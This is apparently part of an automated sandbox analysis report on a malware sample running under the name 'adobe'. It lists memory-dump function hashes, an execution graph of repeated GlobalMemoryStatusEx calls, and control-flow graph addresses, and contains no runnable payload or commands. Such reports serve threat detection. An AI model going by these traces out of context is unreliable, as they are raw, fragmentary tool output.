                                                        • API String ID:
                                                        • Opcode ID: 386e32a18f4ec32f0c3243a4ebeff1326324d17693309519706080a39a4194af
                                                        • Instruction ID: dcc9573e06813744b9eae8025c440909fcebaa38825b347f099cbdd69f9c3dea
                                                        • Opcode Fuzzy Hash: 386e32a18f4ec32f0c3243a4ebeff1326324d17693309519706080a39a4194af
                                                        • Instruction Fuzzy Hash: 3141AD75E00249CBDF19EFB5C1586ADBBB2EFC8220F204429D406AB360DF394981CFA5
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5670000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 379fed52797a0cb62f854d6e61324bcacb4ace21fdc24541ebd71cd404f0f504
                                                        • Instruction ID: 0d48c2e0dbfc80581833adde605d78d7b9ca34dcfac752fefda20a41173bb08a
                                                        • Opcode Fuzzy Hash: 379fed52797a0cb62f854d6e61324bcacb4ace21fdc24541ebd71cd404f0f504
                                                        • Instruction Fuzzy Hash: 2441C1B1D00209CBDB20CFAAC585ADDBBB5FF48315F24852AD409AB250DB756A46CF90
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5670000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 845db1b50974e2a09cecb5ccd7c81a97ef569a70e4bac81353616425455813c4
                                                        • Instruction ID: 23f30c274cd26f626259e0e865461bf2d8773f78159002d4948c6129c7fc9223
                                                        • Opcode Fuzzy Hash: 845db1b50974e2a09cecb5ccd7c81a97ef569a70e4bac81353616425455813c4
                                                        • Instruction Fuzzy Hash: F541B0B1D00209CBDB20CFAAC584ADDFBB5BF48315F64852AD409AB210DB756A46CF91
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5670000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d539e425198e4ef43035448e6498d8edc8b8a4f76cdc67ec34e1f11d8dbcc717
                                                        • Instruction ID: c54b5c6d372c0704102892eaf5b55229f76c3c42ca375a798a4b8576128f445c
                                                        • Opcode Fuzzy Hash: d539e425198e4ef43035448e6498d8edc8b8a4f76cdc67ec34e1f11d8dbcc717
                                                        • Instruction Fuzzy Hash: D141BFB0D1025DDFDB14CF9AC888A9EFBB1BF88750F60852AE418AB354DB745845CF91
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5670000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8b16578a67dac28cc94cb9223662e09954f5695cea52000c49ce7cea06062d51
                                                        • Instruction ID: 054561441611475fa6855fa9d1b481d222dd8145cf744c5f9afce81c6d487e78
                                                        • Opcode Fuzzy Hash: 8b16578a67dac28cc94cb9223662e09954f5695cea52000c49ce7cea06062d51
                                                        • Instruction Fuzzy Hash: B941BEB0D10259DFDB14CF9AC888ADEFBB1BF88750F20862AE419AB354DB745845CF91
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5670000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3a77da9b0e8a36da4f49d5055d786962b0717fdbdd15c470573c7296d7df7623
                                                        • Instruction ID: 2f2f09a12427a35a88aca5cb3eb45e26f43cdaee43d80bb62cb1509fb2dbecfb
                                                        • Opcode Fuzzy Hash: 3a77da9b0e8a36da4f49d5055d786962b0717fdbdd15c470573c7296d7df7623
                                                        • Instruction Fuzzy Hash: E23161B5E00249CBDF29EB74C6592AD77A2EF88221F244529C405BA364DF798981CFB1
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5670000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 632596fb316f6e98a8c396e0e2b801a778124558df7acab7c886cdaeddf4db51
                                                        • Instruction ID: 3d6264fb97521c69880ab585f82f57aa925db7789e1a353d9b33fb473b455dfc
                                                        • Opcode Fuzzy Hash: 632596fb316f6e98a8c396e0e2b801a778124558df7acab7c886cdaeddf4db51
                                                        • Instruction Fuzzy Hash: A031F635A20209EFCB05DFA4D84899EBBB6FF89310F548525F002BB260EF34A845CB90
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1703991994.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_12ed000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 47c3a454be4bd8b89cf627411e1e905a2edfa0393db5ffccaa9913806747a49f
                                                        • Instruction ID: 9f9399881cb06da00d0d2b51122e01250d030eb8ea9d36e55a160af218ce9e70
                                                        • Opcode Fuzzy Hash: 47c3a454be4bd8b89cf627411e1e905a2edfa0393db5ffccaa9913806747a49f
                                                        • Instruction Fuzzy Hash: 6B210671514248DFDF05DF98D9C8B26BFA5FB88320F64C569E9090B247C376D416CBA1
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1703991994.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_12ed000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ee77becb1381c08314e7a9c298e0cec4c100525dc7459f0bae636a2bec51bbcb
                                                        • Instruction ID: 8ed5d786faba612d34b23bdf8d68be95a8ae6836ef42b92e5c5fd2e9993e376a
                                                        • Opcode Fuzzy Hash: ee77becb1381c08314e7a9c298e0cec4c100525dc7459f0bae636a2bec51bbcb
                                                        • Instruction Fuzzy Hash: 032148B5510248DFDB01DF88C9C4B56BFE5FBA8314F64C56CE9090F246C336E406CAA1
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5670000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1936102d1776989dc45c23024b414a8e4fe098beb9d0efc3986250647dfcf04e
                                                        • Instruction ID: 5bb82601fed73caf0ed8b76bd983e3a1578dc3c14abc8d4a617f1aaf79cf9b8c
                                                        • Opcode Fuzzy Hash: 1936102d1776989dc45c23024b414a8e4fe098beb9d0efc3986250647dfcf04e
                                                        • Instruction Fuzzy Hash: D521B535A10209EFCB05DFA4D84899EBFB6FF89314F158525F002BB264EF35A849CB90
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5670000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e1e796d1c45d4b1ad34a981bafe65ebbacb60ec715f6ad61fbe2d4a633e6a663
                                                        • Instruction ID: 8b6da36928c851c1fea707a932f87d608914bc690fba7469c5f74d3a6af7d86e
                                                        • Opcode Fuzzy Hash: e1e796d1c45d4b1ad34a981bafe65ebbacb60ec715f6ad61fbe2d4a633e6a663
                                                        • Instruction Fuzzy Hash: 3621A4357002094FCB10EB79C858AAF7BF6EF84221F108D69E516DB790EF74D8048B91
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1704444369.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_13fd000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d11d638e99d6992e3766335b996c6cdfa609892efebe922124d951b1163815d5
                                                        • Instruction ID: 030768d2a61b56911a1e8358f6012d755c25e59a0cb34bed45039ac26c1a2e2f
                                                        • Opcode Fuzzy Hash: d11d638e99d6992e3766335b996c6cdfa609892efebe922124d951b1163815d5
                                                        • Instruction Fuzzy Hash: EE213471604205DFDB15DF58D8C8B26BFA5FB88318F24C96DEA0A4B346C33AD407CA61
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1704444369.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_13fd000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9a0936b82ac014d0af9574400cc4c2d33fc0cfee5c1edc946f28a0978b39d466
                                                        • Instruction ID: 13b8bcd46593a52732f0549337390ed108075f080926d1a69cbe7c63da2bcf2e
                                                        • Opcode Fuzzy Hash: 9a0936b82ac014d0af9574400cc4c2d33fc0cfee5c1edc946f28a0978b39d466
                                                        • Instruction Fuzzy Hash: BC2180755093808FDB13CF64D994715BF71EB46218F28C5EAD9498F2A7C33A980ACB62
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1703991994.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_12ed000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 083a0aad303073c06da1a146aa343d8be4e7eaa9cc126e7cc12db35873612b5c
                                                        • Instruction ID: 1ff640a366e14e0d0ffca10596c00e8328903d4a6da8774acaa8c85c42a45784
                                                        • Opcode Fuzzy Hash: 083a0aad303073c06da1a146aa343d8be4e7eaa9cc126e7cc12db35873612b5c
                                                        • Instruction Fuzzy Hash: 6C21C076404244CFDB06CF54D9C4B16BFA1FB84320F24C1A9DD080B257C33AD416CB91
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1703991994.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_12ed000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                        • Instruction ID: 4a2edd9da145a6fb85bc3fb659044a1e88fd0542f76cdae2e38777d36eb06af8
                                                        • Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                                        • Instruction Fuzzy Hash: 67110376404285CFDB12CF44D5C4B56BFB1FB94324F24C2A9DA090B257C33AE45ACBA1
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5670000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 418ef1d7ccfc5f5d2026356db7abd04b433307ee023ec497cabfedbedf431fc4
                                                        • Instruction ID: 6dd4ffeb56cc4f05eca6c080f6bbbb9b581cf920332496b38054bb6a7d02f939
                                                        • Opcode Fuzzy Hash: 418ef1d7ccfc5f5d2026356db7abd04b433307ee023ec497cabfedbedf431fc4
                                                        • Instruction Fuzzy Hash: DC115EB5E0420ACFEF25EF75C2583AD7AA2EF88361F144429D401AA290DF784984CFB5
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5670000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e155deaad43e9bdba3e7d6661fdb7fe919b2e3c244477c7cef1d7cff6a080e32
                                                        • Instruction ID: c104df4d384c0eb1120d22ca22f03ae4cc54d8de1669f922bd39ee6a57695eff
                                                        • Opcode Fuzzy Hash: e155deaad43e9bdba3e7d6661fdb7fe919b2e3c244477c7cef1d7cff6a080e32
                                                        • Instruction Fuzzy Hash: F4F054B1E0420ACBEB14EF75D65976D7BB2EF88355F148529D001AB690DF784484CFB1
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5670000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e0d44330969e7b89dfde46b66b6f082883c8b47d043a1bf94a1e63ba8c0711e1
                                                        • Instruction ID: 424659971562ffbb0daa1708725bde90fcf3f4cf9c93a13aefe52a2573a8f9be
                                                        • Opcode Fuzzy Hash: e0d44330969e7b89dfde46b66b6f082883c8b47d043a1bf94a1e63ba8c0711e1
                                                        • Instruction Fuzzy Hash: 6BE09B7590120AEFCB00EFB5D90266D7BF5EB45711F118769D805A7380EA396F009755
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.1705881140.0000000005670000.00000040.00000800.00020000.00000000.sdmp, Offset: 05670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_5670000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1e89669da587eaea31211efc82310d8b752fcff62045fb4e26121e929bb54c5f
                                                        • Instruction ID: 0b3d7496f98676700ef16494c4e0d8352d489093ce73af62d407eab01d7d98dd
                                                        • Opcode Fuzzy Hash: 1e89669da587eaea31211efc82310d8b752fcff62045fb4e26121e929bb54c5f
                                                        • Instruction Fuzzy Hash: 19E0867590110AEFCB00EFB5D6024AC7BB9EB443047108565E805A7340DA3A2F10DB55

                                                        Execution Graph

                                                        Execution Coverage:7.8%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:19
                                                        Total number of Limit Nodes:4
                                                        execution_graph 37962 13a0848 37963 13a084e 37962->37963 37964 13a091b 37963->37964 37966 13a1350 37963->37966 37967 13a1366 37966->37967 37968 13a147a 37967->37968 37970 13a8221 37967->37970 37968->37963 37972 13a822b 37970->37972 37971 13a82e1 37971->37967 37972->37971 37975 6b7f9c1 37972->37975 37980 6b7f9d0 37972->37980 37977 6b7f9e5 37975->37977 37976 6b7fbfa 37976->37971 37977->37976 37978 6b7fe74 GlobalMemoryStatusEx GlobalMemoryStatusEx 37977->37978 37979 6b7fc11 GlobalMemoryStatusEx GlobalMemoryStatusEx 37977->37979 37978->37977 37979->37977 37982 6b7f9e5 37980->37982 37981 6b7fbfa 37981->37971 37982->37981 37983 6b7fe74 GlobalMemoryStatusEx GlobalMemoryStatusEx 37982->37983 37984 6b7fc11 GlobalMemoryStatusEx GlobalMemoryStatusEx 37982->37984 37983->37982 37984->37982

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 124 6b734a8-6b734c9 126 6b734cb-6b734ce 124->126 127 6b734f4-6b734f7 126->127 128 6b734d0-6b734ef 126->128 129 6b734fd-6b7351c 127->129 130 6b73c98-6b73c9a 127->130 128->127 138 6b73535-6b7353f 129->138 139 6b7351e-6b73521 129->139 132 6b73ca1-6b73ca4 130->132 133 6b73c9c 130->133 132->126 135 6b73caa-6b73cb3 132->135 133->132 142 6b73545-6b73554 138->142 139->138 140 6b73523-6b73533 139->140 140->142 252 6b73556 call 6b73cc0 142->252 253 6b73556 call 6b73cc8 142->253 144 6b7355b-6b73560 145 6b73562-6b73568 144->145 146 6b7356d-6b7384a 144->146 145->135 167 6b73850-6b738ff 146->167 168 6b73c8a-6b73c97 146->168 177 6b73901-6b73926 167->177 178 6b73928 167->178 180 6b73931-6b73944 177->180 178->180 182 6b73c71-6b73c7d 180->182 183 6b7394a-6b7396c 180->183 182->167 184 6b73c83 182->184 183->182 186 6b73972-6b7397c 183->186 184->168 186->182 187 6b73982-6b7398d 186->187 187->182 188 6b73993-6b73a69 187->188 200 6b73a77-6b73aa7 188->200 201 6b73a6b-6b73a6d 188->201 205 6b73ab5-6b73ac1 200->205 206 6b73aa9-6b73aab 200->206 201->200 207 6b73ac3-6b73ac7 205->207 208 6b73b21-6b73b25 205->208 206->205 207->208 211 6b73ac9-6b73af3 207->211 209 6b73c62-6b73c6b 208->209 210 6b73b2b-6b73b67 208->210 209->182 209->188 222 6b73b75-6b73b83 210->222 223 6b73b69-6b73b6b 210->223 218 6b73af5-6b73af7 211->218 219 6b73b01-6b73b1e call 6b723a0 211->219 218->219 219->208 226 6b73b85-6b73b90 222->226 227 6b73b9a-6b73ba5 222->227 223->222 226->227 232 6b73b92 226->232 230 6b73ba7-6b73bad 227->230 231 6b73bbd-6b73bce 227->231 233 6b73bb1-6b73bb3 230->233 234 6b73baf 230->234 236 6b73be6-6b73bf2 231->236 237 6b73bd0-6b73bd6 231->237 232->227 233->231 234->231 241 6b73bf4-6b73bfa 236->241 242 6b73c0a-6b73c5b 236->242 238 6b73bda-6b73bdc 237->238 239 6b73bd8 237->239 238->236 239->236 243 6b73bfe-6b73c00 241->243 244 6b73bfc 241->244 242->209 243->242 244->242 252->144 253->144
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq$$eq$$eq$$eq
                                                        • API String ID: 0-220072568
                                                        • Opcode ID: 962bd63a886283b698a3793879920795b541751a94ea247b32529d3020f83be2
                                                        • Instruction ID: 6f042d9577e6456bebcf1752067c478a0b3222d7cb416a1eae241dce0265bd32
                                                        • Opcode Fuzzy Hash: 962bd63a886283b698a3793879920795b541751a94ea247b32529d3020f83be2
                                                        • Instruction Fuzzy Hash: 9A321D70E1071ACFCB55EF79C89459DF7B2FF89300F5086A9D419AB264EB30A985CB90

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 797 6b77dc8-6b77de6 799 6b77de8-6b77deb 797->799 800 6b77ded-6b77df7 799->800 801 6b77df8-6b77dfb 799->801 802 6b77e1e-6b77e21 801->802 803 6b77dfd-6b77e19 801->803 804 6b77e23-6b77e3d 802->804 805 6b77e42-6b77e45 802->805 803->802 804->805 807 6b77e47-6b77e55 805->807 808 6b77e5c-6b77e5e 805->808 812 6b77e6e-6b77e84 807->812 816 6b77e57 807->816 810 6b77e65-6b77e68 808->810 811 6b77e60 808->811 810->799 810->812 811->810 818 6b7809f-6b780a9 812->818 819 6b77e8a-6b77e93 812->819 816->808 820 6b780aa-6b780b4 819->820 821 6b77e99-6b77eb6 819->821 824 6b780b6-6b780df 820->824 825 6b7810b 820->825 831 6b7808c-6b78099 821->831 832 6b77ebc-6b77ee4 821->832 829 6b780e1-6b780e4 824->829 826 6b7810f-6b78111 825->826 827 6b7810d 825->827 830 6b7811b-6b78122 826->830 827->830 833 6b78197-6b7819a 829->833 834 6b780ea-6b780f6 829->834 837 6b78124-6b78131 830->837 838 6b78133 830->838 831->818 831->819 832->831 856 6b77eea-6b77ef3 832->856 835 6b783c6-6b783c9 833->835 836 6b781a0-6b781af 833->836 839 6b78101-6b78103 834->839 840 6b783ec-6b783ee 835->840 841 6b783cb-6b783e7 835->841 851 6b781b1-6b781cc 836->851 852 6b781ce-6b78209 836->852 842 6b78138-6b7813a 837->842 838->842 839->830 844 6b78105 839->844 845 6b783f5-6b783f8 840->845 846 6b783f0 840->846 841->840 848 6b78151-6b7818a 842->848 849 6b7813c-6b7813f 842->849 844->825 845->829 853 6b783fe-6b78407 845->853 846->845 848->836 876 6b7818c-6b78196 848->876 849->853 851->852 861 6b7820f-6b78220 852->861 862 6b7839a-6b783b0 852->862 856->820 858 6b77ef9-6b77f15 856->858 869 6b77f1b-6b77f45 858->869 870 6b7807a-6b78086 858->870 872 6b78226-6b78243 861->872 873 6b78385-6b78394 861->873 862->835 883 6b78070-6b78075 869->883 884 6b77f4b-6b77f73 869->884 870->831 870->856 872->873 881 6b78249-6b7833f call 6b765e8 872->881 873->861 873->862 933 6b78341-6b7834b 881->933 934 6b7834d 881->934 883->870 884->883 891 6b77f79-6b77fa7 884->891 891->883 896 6b77fad-6b77fb6 891->896 896->883 898 6b77fbc-6b77fee 896->898 905 6b77ff0-6b77ff4 898->905 906 6b77ff9-6b78015 898->906 905->883 908 6b77ff6 905->908 906->870 909 6b78017-6b7806e call 6b765e8 906->909 908->906 909->870 935 6b78352-6b78354 933->935 934->935 935->873 936 6b78356-6b7835b 935->936 937 6b7835d-6b78367 936->937 938 6b78369 936->938 939 6b7836e-6b78370 937->939 938->939 939->873 940 6b78372-6b7837e 939->940 940->873
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq
                                                        • API String ID: 0-2246304398
                                                        • Opcode ID: 04ebd424c49d26fa4a30c94ab1e092092165977de143c3139024ed891a1536b1
                                                        • Instruction ID: a5c40e3fbc0ebe28e6e20ebb5a774bc17115789e51f612838a65bd23442c64b3
                                                        • Opcode Fuzzy Hash: 04ebd424c49d26fa4a30c94ab1e092092165977de143c3139024ed891a1536b1
                                                        • Instruction Fuzzy Hash: 38027E70B0021A8FDB54DB79D95466EB7A2FF84304F1485B9E426DB398EB31EC42CB90

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1156 6b755e8-6b75605 1157 6b75607-6b7560a 1156->1157 1158 6b75612-6b75615 1157->1158 1159 6b7560c-6b7560d 1157->1159 1160 6b75617-6b7561e 1158->1160 1161 6b75623-6b75626 1158->1161 1159->1158 1160->1161 1162 6b75635-6b75638 1161->1162 1163 6b75628-6b7562e 1161->1163 1165 6b7563a-6b7563d 1162->1165 1166 6b75642-6b75645 1162->1166 1164 6b75630 1163->1164 1163->1165 1164->1162 1165->1166 1167 6b75647-6b75659 1166->1167 1168 6b7565e-6b75661 1166->1168 1167->1168 1169 6b75687-6b7568a 1168->1169 1170 6b75663-6b75682 1168->1170 1172 6b75694-6b75697 1169->1172 1173 6b7568c-6b7568f 1169->1173 1170->1169 1174 6b75721-6b75727 1172->1174 1175 6b7569d-6b756a0 1172->1175 1173->1172 1179 6b75733-6b75739 1174->1179 1180 6b75729 1174->1180 1177 6b756b3-6b756b6 1175->1177 1178 6b756a2-6b756a8 1175->1178 1177->1178 1183 6b756b8-6b756bb 1177->1183 1181 6b75762-6b7576c 1178->1181 1182 6b756ae 1178->1182 1185 6b757b3-6b757e3 1179->1185 1186 6b7573b-6b75743 1179->1186 1184 6b7572e-6b75731 1180->1184 1197 6b75773-6b75775 1181->1197 1182->1177 1188 6b756cf-6b756d2 1183->1188 1189 6b756bd-6b756ca 1183->1189 1184->1179 1190 6b7575d-6b75760 1184->1190 1203 6b757ed-6b757f0 1185->1203 1186->1185 1191 6b75745-6b75752 1186->1191 1192 6b756d4-6b756d8 1188->1192 1193 6b756e3-6b756e6 1188->1193 1189->1188 1190->1181 1196 6b7577a-6b7577d 1190->1196 1191->1185 1195 6b75754-6b75758 1191->1195 1201 6b757a5-6b757b2 1192->1201 1202 6b756de 1192->1202 1204 6b75703-6b75706 1193->1204 1205 6b756e8-6b756fe 1193->1205 1195->1190 1198 6b7577f-6b75788 1196->1198 1199 6b75789-6b7578c 1196->1199 1197->1196 1208 6b75793-6b75795 1199->1208 1209 6b7578e-6b75790 1199->1209 1202->1193 1210 6b757f2-6b757f9 1203->1210 1211 6b757fa-6b757fd 1203->1211 1206 6b7571c-6b7571f 1204->1206 1207 6b75708-6b75717 1204->1207 1205->1204 1206->1174 1206->1184 1207->1206 1212 6b75797 1208->1212 1213 6b7579c-6b7579f 1208->1213 1209->1208 1214 6b75811-6b75814 1211->1214 1215 6b757ff-6b75806 1211->1215 1212->1213 1213->1157 1213->1201 1219 6b75836-6b75839 1214->1219 1220 6b75816-6b7581a 1214->1220 1217 6b758ce-6b758d5 1215->1217 1218 6b7580c 1215->1218 1218->1214 1224 6b75851-6b75854 1219->1224 1225 6b7583b-6b7584c 1219->1225 1222 6b758d6-6b758e8 1220->1222 1223 6b75820-6b75828 1220->1223 1234 6b758ea-6b75914 1222->1234 1235 6b75918-6b75919 1222->1235 1223->1222 1226 6b7582e-6b75831 1223->1226 1227 6b75856-6b7585a 1224->1227 1228 6b7586e-6b75871 1224->1228 1225->1224 1226->1219 1227->1222 1230 6b7585c-6b75864 1227->1230 1231 6b75873-6b7587d 1228->1231 1232 6b75882-6b75885 1228->1232 1230->1222 1238 6b75866-6b75869 1230->1238 1231->1232 1236 6b75887-6b7588b 1232->1236 1237 6b7589f-6b758a2 1232->1237 1240 6b75916 1234->1240 1241 6b75927-6b7592a 1235->1241 1242 6b7591b-6b75922 1235->1242 1236->1222 1243 6b7588d-6b75895 1236->1243 1244 6b758a4-6b758a8 1237->1244 1245 6b758bc-6b758be 1237->1245 1238->1228 1240->1235 1247 6b75934-6b75937 1241->1247 1248 6b7592c-6b75931 1241->1248 1242->1241 1243->1222 1246 6b75897-6b7589a 1243->1246 1244->1222 1249 6b758aa-6b758b2 1244->1249 1250 6b758c5-6b758c8 1245->1250 1251 6b758c0 1245->1251 1246->1237 1252 6b75945-6b75948 1247->1252 1253 6b75939-6b75940 1247->1253 1248->1247 1249->1222 1254 6b758b4-6b758b7 1249->1254 1250->1203 1250->1217 1251->1250 1255 6b7594e-6b75951 1252->1255 1256 6b759cd-6b75b61 1252->1256 1253->1252 1254->1245 1257 6b75953-6b75964 1255->1257 1258 6b7596b-6b7596e 1255->1258 1307 6b75c97-6b75caa 1256->1307 1308 6b75b67-6b75b6e 1256->1308 1262 6b7598d-6b7599e 1257->1262 1269 6b75966 1257->1269 1259 6b75970-6b75981 1258->1259 1260 6b75988-6b7598b 1258->1260 1268 6b759ae-6b759c1 1259->1268 1270 6b75983 1259->1270 1260->1262 1263 6b759a9-6b759ac 1260->1263 1262->1242 1274 6b759a4 1262->1274 1267 6b759c4-6b759c7 1263->1267 1263->1268 1267->1256 1272 6b75cad-6b75cb0 1267->1272 1269->1258 1270->1260 1275 6b75cb2-6b75cc3 1272->1275 1276 6b75cce-6b75cd1 1272->1276 1274->1263 1275->1242 1286 6b75cc9 1275->1286 1278 6b75cd3-6b75ce4 1276->1278 1279 6b75cef-6b75cf2 1276->1279 1278->1242 1287 6b75cea 1278->1287 1279->1256 1280 6b75cf8-6b75cfa 1279->1280 1284 6b75d01-6b75d04 1280->1284 1285 6b75cfc 1280->1285 1284->1240 1288 6b75d0a-6b75d13 1284->1288 1285->1284 1286->1276 1287->1279 1309 6b75b74-6b75b97 1308->1309 1310 6b75c22-6b75c29 1308->1310 1319 6b75b9f-6b75ba7 1309->1319 1310->1307 1311 6b75c2b-6b75c5e 1310->1311 1323 6b75c63-6b75c90 1311->1323 1324 6b75c60 1311->1324 1320 6b75bac-6b75bed 1319->1320 1321 6b75ba9 1319->1321 1332 6b75c05-6b75c16 1320->1332 1333 6b75bef-6b75c00 1320->1333 1321->1320 1323->1288 1324->1323 1332->1288 1333->1288
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $
                                                        • API String ID: 0-3993045852
                                                        • Opcode ID: 0e93b0deae836a6fe39b37b7b84001ebdaa70babbbc7b9a7b2286cdb9ab47e57
                                                        • Instruction ID: e286416f4f7a8bf29915061a2a661bb6b66d7b060c348292abacaed6f44e090a
